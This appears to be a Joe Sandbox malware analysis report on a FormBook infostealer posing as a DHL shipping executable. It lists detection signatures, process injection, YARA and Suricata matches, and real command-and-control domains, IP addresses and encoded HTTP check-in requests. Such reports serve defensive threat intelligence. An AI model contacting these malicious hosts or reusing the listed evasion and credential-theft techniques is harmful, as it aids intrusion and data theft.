Edit tour

Windows Analysis Report
DHL 806-232024.exe

Overview

General Information

Sample name:	DHL 806-232024.exe
Analysis ID:	1580265
MD5:	a32e770c62bab92fb9f5413a70a62836
SHA1:	46578409fab1fbe2a943bf685f672334643332ed
SHA256:	00157cae4f7d3b063ab95dcfd1ec233bb79a0fd54a18558fd104ca4599c38874
Tags:	DHLexeFormbookuser-abuse_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

DHL 806-232024.exe (PID: 5168 cmdline: "C:\Users\user\Desktop\DHL 806-232024.exe" MD5: A32E770C62BAB92FB9F5413A70A62836)

svchost.exe (PID: 5280 cmdline: "C:\Users\user\Desktop\DHL 806-232024.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

yAEEhNGBaPExAdMu.exe (PID: 4416 cmdline: "C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

netbtugc.exe (PID: 1200 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)

yAEEhNGBaPExAdMu.exe (PID: 3440 cmdline: "C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 7080 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.2214041996.0000000000320000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2214041996.0000000000320000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4529624062.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4529624062.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4530493179.00000000030D0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4530493179.00000000030D0000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x10d0a7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xf6746:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4530474719.00000000034A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4530474719.00000000034A0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2215036751.0000000004000000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2215036751.0000000004000000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x10d0a7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xf6746:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2214383859.0000000002D90000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2214383859.0000000002D90000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4530432523.0000000003460000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4530432523.0000000003460000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.320000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.320000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.320000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.320000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\DHL 806-232024.exe", CommandLine: "C:\Users\user\Desktop\DHL 806-232024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL 806-232024.exe", ParentImage: C:\Users\user\Desktop\DHL 806-232024.exe, ParentProcessId: 5168, ParentProcessName: DHL 806-232024.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL 806-232024.exe", ProcessId: 5280, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\DHL 806-232024.exe", CommandLine: "C:\Users\user\Desktop\DHL 806-232024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL 806-232024.exe", ParentImage: C:\Users\user\Desktop\DHL 806-232024.exe, ParentProcessId: 5168, ParentProcessName: DHL 806-232024.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL 806-232024.exe", ProcessId: 5280, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T08:23:35.385717+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49732	154.215.72.110	80	TCP
2024-12-24T08:24:09.428113+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49812	116.50.37.244	80	TCP
2024-12-24T08:25:32.858936+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49867	85.159.66.93	80	TCP
2024-12-24T08:25:47.642095+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49990	91.195.240.94	80	TCP
2024-12-24T08:26:11.200375+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49994	66.29.149.46	80	TCP
2024-12-24T08:26:26.330372+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49998	195.110.124.133	80	TCP
2024-12-24T08:26:57.688067+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	50002	217.196.55.202	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.elettrosistemista.zip/fo8o/?SFst=D27DuB&UzG=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==	Avira URL Cloud: Label: malware
Source: http://www.rssnewscast.com/fo8o/?UzG=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&SFst=D27DuB	Avira URL Cloud: Label: malware
Source: http://www.goldenjade-travel.com/fo8o/?SFst=D27DuB&UzG=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==	Avira URL Cloud: Label: malware
Source: http://www.techchains.info/fo8o/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: DHL 806-232024.exe	Virustotal: Detection: 29%			Perma Link
Source: DHL 806-232024.exe	ReversingLabs: Detection: 44%

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.320000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2214041996.0000000000320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4529624062.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4530493179.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4530474719.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2215036751.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2214383859.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4530432523.0000000003460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: DHL 806-232024.exe

Joe Sandbox ML: detected

Source: DHL 806-232024.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: yAEEhNGBaPExAdMu.exe, 00000003.00000002.4529766745.00000000004DE000.00000002.00000001.01000000.00000004.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4529866987.00000000004DE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: DHL 806-232024.exe, 00000000.00000003.2062085946.0000000003930000.00000004.00001000.00020000.00000000.sdmp, DHL 806-232024.exe, 00000000.00000003.2060906795.0000000003790000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2214449127.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2115983541.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2214449127.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2117729754.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4530635872.00000000036A0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4530635872.000000000383E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2216468139.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2214245032.000000000334A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DHL 806-232024.exe, 00000000.00000003.2062085946.0000000003930000.00000004.00001000.00020000.00000000.sdmp, DHL 806-232024.exe, 00000000.00000003.2060906795.0000000003790000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2214449127.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2115983541.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2214449127.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2117729754.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.4530635872.00000000036A0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4530635872.000000000383E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2216468139.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2214245032.000000000334A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.2181119157.000000000281A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2214208965.0000000002800000.00000004.00000020.00020000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000003.00000002.4530115940.00000000009C8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4529839998.000000000320E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4530981261.0000000003CCC000.00000004.10000000.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.00000000029AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2505119370.000000002961C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4529839998.000000000320E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4530981261.0000000003CCC000.00000004.10000000.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.00000000029AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2505119370.000000002961C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.2181119157.000000000281A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2214208965.0000000002800000.00000004.00000020.00020000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000003.00000002.4530115940.00000000009C8000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_00934696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00934696
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_0093C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0093C9C7
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_0093C93C FindFirstFileW,FindClose,	0_2_0093C93C
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_0093F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0093F200
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_0093F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0093F35D
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_0093F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0093F65E
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_00933A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00933A2B
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_00933D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00933D4E
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_0093BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0093BF27
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DCBAB0 FindFirstFileW,FindNextFileW,FindClose,	4_2_02DCBAB0

Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then xor eax, eax	4_2_02DB9480
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then pop edi	4_2_02DBDD45
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then mov ebx, 00000004h	4_2_0358053E

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49732 -> 154.215.72.110:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49812 -> 116.50.37.244:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49867 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50002 -> 217.196.55.202:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49998 -> 195.110.124.133:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49994 -> 66.29.149.46:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49990 -> 91.195.240.94:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.joyesi.xyz

Source: Joe Sandbox View	IP Address: 91.195.240.94 91.195.240.94
Source: Joe Sandbox View	IP Address: 154.215.72.110 154.215.72.110

Source: Joe Sandbox View	ASN Name: SEDO-ASDE SEDO-ASDE
Source: Joe Sandbox View	ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_009425E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_009425E2

Source: global traffic	HTTP traffic detected: GET /fo8o/?SFst=D27DuB&UzG=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?SFst=D27DuB&UzG=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?SFst=D27DuB&UzG=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?UzG=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&SFst=D27DuB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?UzG=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hboQSxRfFXXJhWlOcLO2B4JSrf1qenLAzZaPHfWrFdh0bEA==&SFst=D27DuB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?SFst=D27DuB&UzG=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?UzG=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&SFst=D27DuB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Source: global traffic	DNS traffic detected: DNS query: www.3xfootball.com
Source: global traffic	DNS traffic detected: DNS query: www.kasegitai.tokyo
Source: global traffic	DNS traffic detected: DNS query: www.goldenjade-travel.com
Source: global traffic	DNS traffic detected: DNS query: www.antonio-vivaldi.mobi
Source: global traffic	DNS traffic detected: DNS query: www.magmadokum.com
Source: global traffic	DNS traffic detected: DNS query: www.rssnewscast.com
Source: global traffic	DNS traffic detected: DNS query: www.liangyuen528.com
Source: global traffic	DNS traffic detected: DNS query: www.techchains.info
Source: global traffic	DNS traffic detected: DNS query: www.elettrosistemista.zip
